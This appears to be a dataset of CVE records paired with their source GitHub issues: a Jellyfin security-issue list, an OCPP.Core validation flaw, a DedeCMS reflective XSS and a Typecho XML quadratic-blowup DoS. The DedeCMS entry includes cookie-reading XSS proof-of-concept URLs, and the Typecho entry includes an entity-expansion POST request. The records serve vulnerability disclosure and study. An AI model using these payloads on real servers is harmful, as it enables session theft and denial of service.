Currently affects "GetAudioStream()" and "GetAudioStreamByContainer()" endpoints. Anyone with knowledge about item ID's can retrieve audio from the server, even if not logged in. - Potential fix: Authenticate endpoints - ~~All~~ Most endpoints in DashboardController are unauthenticated [Update: Partially authenticated since 10.8b1] - As of 10.7, this controller apparently contains admin dashboard (plugin) configuration pages. While the pages alone are not highly sensitive by itself (the controller only returns the list & html pages without config data), the endpoints being completly unauthenticated allows anyone to retrieve information about the server, e.g this leaks the installed plugins. - Potential fix: Require admin privileges (at least user privileges) to access these pages - All (raw) image endpoints in ImageByNameController, ImageController & RemoteImageController are unauthenticated - This allows probing on whether a specific image exists on the server by guessing item id's (which can be done without too much trouble, as item ids are based on filepath and filename information) and then checking on what content (movies, series etc) exist on a given server, without having an account. - Potential fix: This is tricky, because the images are loaded by the browser itself, so currently no authentication is provided. Below I propose a new authentication mechanism which would also fix this issue, allowing these endpoints to be authenticated. - PluginsController only requires user privileges for potentially sensitive actions - Includes, but is not limited to: Listing all plugins on the server without being admin, changing plugin settings, listing plugin settings without being admin. **This includes the possibility of retrieving LDAP access credentials without admin privileges**. In specific conditions it can also lead to attacks that leak entire user passwords, e.g by changing the remote LDAP server to an attacker controlled server. - Potential fix: Require admin privileges for all potentially sensitive plugin endpoints, e.g all non-legacy endpoints. - GetUsers() endpoint (UserController) only requires user privileges - Allows listing of any user, id included, on the server, not limited to public users. Can leverage massively more invasive attacks due to further issues with user id authentication, see below. - Potential fix: Require admin privileges on this endpoint - GetUser() endpoint (UserController) is fully unauthenticated - Allows an attacker with knowledge of user id's (easily retrievable for authenticated users due to open /Users endpoint, see above) to get the entire user configuration for a given user, potentially containing sensitive or private information. Examples include the authentication provider, last login dates as well as bruteforce login information (login attempt counters). - Potential fix: Require user privileges on this endpoint. Better would be to only allow users to retrieve their own data, only admins should have the ability to see all users. See below for issues relating to per-user authentication. - ~~GetUserViews() & GetGroupingOptions() (UserViewsController) endpoints are unauthenticated~~ [Update: Resolved in 10.8b1] - Allows anyone with knowledge of a user id to retrieve potentially user-personalized data of a user, without being authenticated as this user (also works without having an account on the server). Potentially leaks personal data of users. - Potential fix: Require user authentication (ideally specific per-user authentication) for these endpoints. - GetAttachment() (VideoAttachmentsController) endpoint is unauthenticated - Allows anyone with knowdlege of a video id to retrieve any attachments, without requiring valid credentials - Potential fix: Require authentication on this endpoint - GetSystemInfo() (SystemController) is unauthenticated - Leaks internal information about the server - Potential fix: Only allow during first time setup, then require admin access - Branding/Splashscreen API endpoint (ImageController) is unauthenticated [New in 10.8] - Returns an image auto-generated from available media on the server. As this image is publicy available, this partially leaks metadata about media available on the server. - Potential fix: Require authentication on this endpoint (may be difficult without auth rewrite, see other image issues above) <sup>1</sup> except HlsSegmentController because the m3u playlist generated doesn't contain parameters ## Authentication and user ids are decoupled This is basically a single issue, however because it affects at least 27 controllers (+ many more endpoints) I'm listing this an issue category. This issue is related to #5210. Quoting my statements from that issue: > > As soon as you know a user's id, you do really get some data. If you modify your local storage to use an admin's user id, the UI starts showing the admin dashboard and the admin user's data (continue watching, favorites etc), but you cannot perform any admin-only API calls there as your session is still not privileged. > > You can still mess with the others user data - you can for example list or modify their favorites, recently watched, their progress on movies and series, see what they watched and so on, but you do not gain admin access. You basically get access to other users data, without gaining their privileges. > > It's a bit of a weakness of the Jellyfin API, that simply having a user's id + having some authentication token (from any other user) exposes much of the data of the other user. Most of the API simply takes the user id as a parameter, without checking if the current session is allowed to view data of that user. Explanation: Because the API isn't checking whether the session authorization matches the id of the requested user, any authenticated user can edit every other user. This includes, but is not limited to, viewing & modifying favorites, watch progress, customizations, profile settings (except passwords), views and many more. <s>The API only performs this check when attempting to perform actions such as changing a password: Then a function "assertCanUpdateUser()" from RequestHelpers is called to ensure that the session auth is valid to modify the password. Such a check, which binds auth information to the user id, should be present (almost) everywhere to ensure that users do not modify other users data.</s> Exceptions could be made to admin users, but normal users should not be able to view or edit other users. Update: Since 10.9, basic checking of update permissions is now performed on (most?) endpoints that update user data. It is still possible to read another user's data without admin privileges. The only requirement for this is knowledge of a user id, which is currently trivially easy due to loose permissions on the /Users endpoint. ## Issues related to how authentication is handled ### Authentication information in HTTP URL's - the `api_key` parameter Related: #3492 The jellyfin API currently accepts authentication either via a custom header, `X-Emby-Authorization` (or similar) or via a get parameter, `api_key`, which is used sometimes by the web client. The latter is problematic because having secrets in a URL is generally not a great idea. A user who copies a URL maybe isn't aware that the URL contains secrets. Especially stream URLs are very long, because they contain many parameters and so the api_key parameter is easily overlooked. A user who carelessly shares such URL exposes their credentials to the world. In addition, server admins who run jellyfin behind some type of (reverse) proxy almost always make some type of request logging. Request logging almost always includes the entire request url. This exposes the secret parameter to a logfile, making the logfile itself a precious secret. This is dangerous, as even too wide permissions on a single logfile can expose session credentials. On most webservers it is possible to censor such parameters before writing to a logfile, but this isn't currently explained or mentioned anywhere in the Jellyfin docs. (I do plan to make such a PR later to the docs page, if I don't forget it). Update: [The PR](https://github.com/jellyfin/jellyfin-docs/pull/522) is now live. This issue - secrets in URLs - is long known to web developers. Sometimes it can't be avoided, but I believe the best way going forward would be to get rid of api_key parameters in URLs. It prevents many dragons lurking around. ### Authentication information is stored in browsers local storage Another rather big topic, with potential for controversy. Currently client authentication is handled by Javascript reading secrets from the browsers local storage and sending this via a custom HTTP header (or sometimes crafting URLs with an api_key parameter). This is bad design, because a single XSS issue is enough to read out the local storage, extracting user credentials (session auth tokens), thus hijacking a user's entire session with a Jellyfin server. Many people don't like Cookies, I know, but until we have something better (like HTTP state tokens or so) Cookies are the best way to handle this going forward. Authentication data should be stored in a HTTP Cookie with Secure, HttpOnly and SameSite=Lax/Strict attributes set. A HttpOnly cookie prevents JavaScript from accessing user credentials, even if an attacker has JavaScript access due to an XSS issue. Right now, Jellyfin has some CSRF protection because on cross site requests no authentication data is send. SameSite attributes produce similar effects, hopefully preventing CSRF issues. This would also mean that the browser now includes authentication information on every request, thus making changes to authentication (see "Unauthenticated endpoints" above) much easier.
Collection of potential security issues in Jellyfin
https://api.github.com/repos/jellyfin/jellyfin/issues/5415/comments
88
2021-03-08T17:36:50Z
2025-04-23T19:55:37Z
https://github.com/jellyfin/jellyfin/issues/5415
824,791,596
5,415
5,788
CVE-2023-49958
2023-12-07T13:15:07.833
An issue was discovered in Dalmann OCPP.Core through 1.2.0 for OCPP (Open Charge Point Protocol) for electric vehicles. The server processes mishandle StartTransaction messages containing additional, arbitrary properties, or duplicate properties. The last occurrence of a duplicate property is accepted. This could be exploited to alter transaction records or impact system integrity.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/dallmann-consulting/OCPP.Core/issues/36" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/dallmann-consulting/OCPP.Core/issues/36" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dallmann-consulting:open_charge_point_protocol:*:*:*:*:*:*:*:*", "matchCriteriaId": "E2779F2A-1D74-4C69-8151-B5E9D49F025A", "versionEndExcluding": null, "versionEndIncluding": "1.2.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/dallmann-consulting/OCPP.Core/issues/36
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "dallmann-consulting", "OCPP.Core" ]
**Issue Description**: The server accepts additional, arbitrary properties in the `StartTransaction` message, and when duplicate properties are provided, it accepts the last occurrence without validation. For example, a message with two different `connectorId` properties is processed using the value of the last one. **Steps to Reproduce**: 1. Send a `StartTransaction` message with a custom additional property. 2. Send a `StartTransaction` message with duplicate properties, such as two different `connectorId` values. 3. Observe that the server accepts the message and processes it based on the last occurrence of the duplicate property. **Expected Behavior**: The server should either reject messages with unknown additional properties. For duplicate properties, it should reject the message. **Actual Behavior**: The server stores the value from the last occurrence of a duplicate property in the `StartTransaction` message, leading to potential misconfigurations. **Potential Impact**: Accepting additional and duplicate properties without validation may lead to unpredictable system behavior and could be exploited to alter transaction records or impact system integrity. Best regards, Gaetano Coppoletta
Unvalidated Acceptance of Additional and Duplicate Properties in `StartTransaction` Message
https://api.github.com/repos/dallmann-consulting/OCPP.Core/issues/36/comments
11
2023-11-06T19:10:53Z
2023-12-28T12:59:10Z
https://github.com/dallmann-consulting/OCPP.Core/issues/36
1,979,885,162
36
5,789
CVE-2023-49492
2023-12-07T16:15:07.587
DedeCMS v5.7.111 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the imgstick parameter at selectimages.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Hebing123/cve/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Hebing123/cve/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dedecms:dedecms:5.7.111:*:*:*:*:*:*:*", "matchCriteriaId": "377F392A-A04B-4E7A-BBE8-F77CE65BDFCF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Hebing123/cve/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Hebing123", "cve" ]
**Description** DedeCMS-V5.7.111 has Reflective XSS vulnerabilities in imgstick and v parameters of selectimages.php **Proof of Concept** `http://target-ip/uploads/include/dialog/select_images.php?activepath=/uploads/uploads/allimg&f=form1.pic1&imgstick=smallundefined%27%3E%3CScRiPt%20%3Ealert(document.cookie)%3C/ScRiPt%3E//` or `http://target-ip/include/dialog/select_images.php?activepath=/uploads/allimg&f=form1.pic1&imgstick=smallundefined'><ScRiPt>alert(document.cookie)</ScRiPt>//` ![image](https://github.com/Hebing123/cve/assets/66168888/e8a86d44-bc2b-42e4-9ee2-e3684edd009d) `http://target-ip/uploads/include/dialog/select_images.php?activepath=/uploads/uploads/allimg&f=form1.pic1&imgstick=smallundefined&noeditor=yes&v=picview%3CScRiPt%20%3Ealert(document.cookie)%3C/ScRiPt%3E` or `http://target-ip/include/dialog/select_images.php?activepath=/uploads/allimg&f=form1.pic1&v=smallundefined'><ScRiPt >alert(document.cookie)</ScRiPt>//` ![image](https://github.com/Hebing123/cve/assets/66168888/f96fea63-e4b3-41f0-9add-79fa056dc3dd) Reflective XSS vulnerability in imgstick and v parameters of select_images.php **Impact** Reflective XSS vulnerability triggered by administrator accessing the link.
DedeCMS-V5.7.111 Reflective XSS vulnerability
https://api.github.com/repos/Hebing123/cve/issues/2/comments
2
2023-11-23T10:03:34Z
2024-11-28T10:41:23Z
https://github.com/Hebing123/cve/issues/2
2,007,862,637
2
5,790
CVE-2023-49967
2023-12-07T16:15:07.680
Typecho v1.2.1 was discovered to be vulnerable to an XML Quadratic Blowup attack via the component /index.php/action/xmlrpc.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/typecho/typecho/issues/1648" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/typecho/typecho/issues/1648" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:typecho:typecho:1.2.1:-:*:*:*:*:*:*", "matchCriteriaId": "0BE056CC-41EF-4C70-9B90-6C654B543A40", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:typecho:typecho:1.2.1:rc:*:*:*:*:*:*", "matchCriteriaId": "8D8A792A-8F66-4086-A649-21091FB4FC39", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:typecho:typecho:1.2.1:rc2:*:*:*:*:*:*", "matchCriteriaId": "7EE225B6-637F-433B-9804-931B6928F405", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "776" ]
776
https://github.com/typecho/typecho/issues/1648
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "typecho", "typecho" ]
### Vulnerability report **Description** DoS via XML Quadratic Blowup Attack **Proof of Concept** ![image](https://github.com/typecho/typecho/assets/66168888/5f217846-f321-496e-baf5-8c053c65c0d7) ``` POST /index.php/action/xmlrpc HTTP/1.1 Content-Length: 83630 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Host: 192.168.160.147 Connection: Keep-alive <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE lolz [ <!ENTITY poc "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa............."> ]> <methodCall> <methodName>aaa&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc;&poc